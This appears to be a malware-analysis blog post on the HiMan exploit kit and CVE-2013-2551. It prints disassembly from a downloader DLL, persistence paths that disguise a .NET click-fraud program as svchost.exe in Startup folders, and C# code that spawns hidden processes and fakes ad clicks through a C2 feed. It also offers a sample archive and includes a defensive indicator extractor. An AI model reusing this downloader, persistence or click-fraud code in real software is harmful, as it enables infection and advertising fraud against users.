HiMan EK and CVE-2013-2551

Recently, during one of my analyses of URLs from urlquery, I came across a URL ending in /ie8910.html.

The link, once opened, returns an index page with the following code:

[screenshot: farert_2]
As can be seen from the “ip-blocked-by-firefox” message, Google Safe Browsing is already blocking the address. There is no active service on port 8080, while one is running on port 80. At the time of writing, the JAR files do not seem to be reachable on the server.

I’ve run a quick analysis of ie8910.html on VirusTotal, which reports the use of CVE-2013-2551 and HiMan EK on the main page. We can confirm that it’s HiMan EK from this Malware don’t need Coffee post.

If the page’s name is any indication, this exploit should work on IE 8, 9 and 10, so I set up my virtual machine environment with Windows XP SP3 and IE8, and I ran Wireshark to analyse the network traffic.

The exploit tries to download a file called “dd” (VirusTotal report).

The downloaded file is a DLL; here’s a code snippet:

call    ping_server
add     esp, 8
push    offset ProcName ; "URLDownloadToFileA"
push    offset LibFileName ; "urlmon.dll"
call    ds:LoadLibraryA
push    eax             ; hModule
call    ds:GetProcAddress
push    ebx
mov     URLDownloadToFileA, eax
call    main_bad

Main_bad takes care of the main initialisation: it downloads a .NET exe called farert.exe, which is copied, depending on the Windows version, to one of:

  • “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startu\svchost.exe”
  • “C:\Documents and Settings\All users\Start Menu\Programs\Startup\svchost.exe”
  • “\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe”
  • “\Start Menu\Programs\Startup\svchost.exe”

and then executed with a call to “WinExec”.

This DLL in turn downloads two other DLLs from the server, versionxp.dll and version7.dll, which are copied multiple times to several different folders.

The check that distinguishes Windows XP from Windows 7 is performed like this:

.text:1000189D
push    offset FileName ; "C:\\Program Files (x86)"
call    ds:GetFileAttributesA
cmp     eax, 0FFFFFFFFh
jz      loc_10001971

This is how the strings are reconstructed:

.text:10001219                 mov     ecx, ds:dword_1000A08C ;"srev"
.text:1000121F                 mov     [eax], ecx
.text:10001221                 mov     edx, ds:dword_1000A090; ".noi"
.text:10001227                 mov     [eax+4], edx
.text:1000122A                 mov     ecx, ds:dword_1000A094; "lld"
.text:10001236                 mov     [eax+8], ecx

So on the stack we find, of course, “version.dll”.

Now for the interesting part, the .NET exe. This malware starts by patching a few APIs and then moves the mouse cursor in order to emulate clicks on premium links (so we can classify it as pay-per-click fraudware). Let’s see how it works.

First of all, it fetches the following URL from the server:

FeedURL = “http://***ip***:82/feed.dll?pub_id=326&ua={$userAgent}”;

which returns JSON like this:

{"query":"futuristic architecture",
"tasks":[{"referer":"http://ph****h.com/",
"bid":"0.00016",
"clickurl":"http://***ip***:82/click?sid=c0fbd3551ecc707eeaef23a963c777680f494dc8&cid=0"}]}

The clickurl points to the malicious server, which answers with an HTTP 301 redirect to the real link. Using the data from the JSON it has just fetched, the malware runs a new instance of itself, passing an argument like this:

minion=true constants=ref%3Dhttp%3A%2F%2Ffi***ng.info%2F%25%3B%3Bclickurl%3Dhttp%3A%2F%2F***ip***%3A82%2Fclick%3Fsid%3D7365074149f1d4c825b06d9932ae48923f19a874%26cid%3D0%25%3B%3B

(URL-decoded)
minion=true constants=ref=http://fi***ng.info/%;;clickurl=http://***ip***:82/click?sid=7365074149f1d4c825b06d9932ae48923f19a874&cid=0%;;

This is the code that starts a new process:

ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.FileName = location;                    // path of the running exe itself
startInfo.Arguments = string.Format("minion=true constants={0}", constants); // ref/clickurl fields, URL-encoded
startInfo.UseShellExecute = false;
startInfo.CreateNoWindow = true;                  // the child runs without a visible window
worker.workProc = Process.Start(startInfo);

When the new process starts, it emulates a click on a paying link: it opens the referrer URL with the WebBrowser class and creates a new A element:

 this.parent.Form1.gui.NavigatingFromRef = true;  // the referer page is already loaded in webBrowser1
 HtmlElement newElement = this.parent.Form1.gui.webBrowser1.Document.CreateElement("a");
 newElement.SetAttribute("HREF", clickurl);       // clickurl taken from the feed JSON
 newElement.SetAttribute("ID", "aa");
 newElement.InnerText = "Visit our Web site for more details.";
 this.parent.Form1.gui.webBrowser1.Document.Body.AppendChild(newElement);
 newElement.InvokeMember("Click");                // fake click, so the request carries the referer

As you can see, it’s still active at the time of writing.

Attention: the .NET exe can also execute code on demand: if the keyword “script” is present in the JSON fetched from the server, that code is executed with the “Jitter.JIT(code)” method.
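The feed JSON, the “minion=true constants=…” command line and the “script” keyword above are the artefacts an analyst would want to pull indicators from. The following is an added example (not the blog’s code and not the malware’s), a small extractor that decodes both the command line and the feed body; the log line is constructed from the Startup path and argument shown in the post, and the placement of the “script” key is an assumption.

```python
import json
import re
from urllib.parse import parse_qs, unquote, urlsplit

MINION_RE = re.compile(r"minion=true\s+constants=(\S+)")

def parse_constants(encoded):
    """URL-decode the 'constants' argument; each key=value field ends in '%;;'."""
    fields = {}
    for field in unquote(encoded).split("%;;"):
        key, sep, value = field.partition("=")
        if sep:
            fields[key] = value
    return fields

def indicators_from_cmdline(cmdline):
    """Return ref, clickurl and C2 details for a minion process, else None."""
    match = MINION_RE.search(cmdline)
    if match is None:
        return None
    fields = parse_constants(match.group(1))
    click = urlsplit(fields.get("clickurl", ""))
    return {
        "ref": fields.get("ref"),
        "clickurl": fields.get("clickurl"),
        "c2_host": click.hostname,
        "c2_port": click.port,
        "sid": parse_qs(click.query).get("sid", [None])[0],
    }

def indicators_from_feed(body):
    """Pull referers and clickurls from a feed.dll response; flag 'script'."""
    feed = json.loads(body)
    tasks = feed.get("tasks", [])
    return {
        "query": feed.get("query"),
        "referers": [t.get("referer") for t in tasks],
        "clickurls": [t.get("clickurl") for t in tasks],
        # Assumed placement: a "script" key (top level or per task) means the
        # exe will JIT and run server-supplied code, so treat it as high severity.
        "script_present": "script" in feed or any("script" in t for t in tasks),
    }

# Sample inputs: feed body from the post; constructed process-creation command line.
FEED = ('{"query":"futuristic architecture","tasks":[{"referer":"http://ph****h.com/",'
        '"bid":"0.00016","clickurl":"http://***ip***:82/click?sid=c0fbd3551ecc707eeaef23a963c777680f494dc8&cid=0"}]}')
CMDLINE = (r'"C:\Documents and Settings\All users\Start Menu\Programs\Startup\svchost.exe" '
           'minion=true constants=ref%3Dhttp%3A%2F%2Ffi***ng.info%2F%25%3B%3Bclickurl%3D'
           'http%3A%2F%2F***ip***%3A82%2Fclick%3Fsid%3D7365074149f1d4c825b06d9932ae48923f19a874%26cid%3D0%25%3B%3B')
```

Feeding indicators_from_cmdline the process-creation lines from an endpoint log and indicators_from_feed the port 82 responses from the pcap gives the referer, click and C2 values to block or hunt for.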

If you want to proceed with a more thorough analysis, you can download the zip with all the related files and some pcap captures (the password, as usual, is: infected).

Pn